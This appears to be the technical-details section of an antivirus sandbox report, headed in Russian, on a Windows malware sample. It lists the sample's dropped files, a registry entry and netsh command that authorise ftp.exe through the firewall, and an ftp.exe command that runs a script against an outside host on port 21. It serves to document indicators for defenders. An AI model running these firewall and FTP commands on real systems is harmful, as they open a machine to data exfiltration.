Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\ftp.exe' = '<SYSTEM32>\ftp.exe:*:Enabled:FileTransferProtocol'
- <SYSTEM32>\ftp.exe -s:"%TEMP%\ftp.dat" jork.freehostia.com
- <SYSTEM32>\netsh.exe firewall add allowedprogram <SYSTEM32>\ftp.exe FileTransferProtocol ENABLE
- %TEMP%\softokn3.dll
- %TEMP%\plc4.dll
- %TEMP%\nspr4.dll
- %TEMP%\ftp.dat
- %TEMP%\plds4.dll
- %TEMP%\nss3.dll
- %TEMP%\nsm3.tmp\ExecDos.dll
- %TEMP%\nsm3.tmp\FindProcDLL.dll
- %TEMP%\nsm3.tmp\System.dll
- %TEMP%\nsw2.tmp
- %TEMP%\runtime.exe
- %TEMP%\dependencies.exe
- %TEMP%\nsm3.tmp\UserMgr.dll
- %TEMP%\nsm3.tmp\FindProcDLL.dll
- %TEMP%\nsm3.tmp\System.dll
- %TEMP%\nsm3.tmp\UserMgr.dll
- %TEMP%\nsm3.tmp\ExecDos.dll
- %TEMP%\runtime.exe
- %TEMP%\dependencies.exe
- %TEMP%\ftp.dat
- 'localhost':1040
- 'jo##.#reehostia.com':21
- DNS ASK jo##.#reehostia.com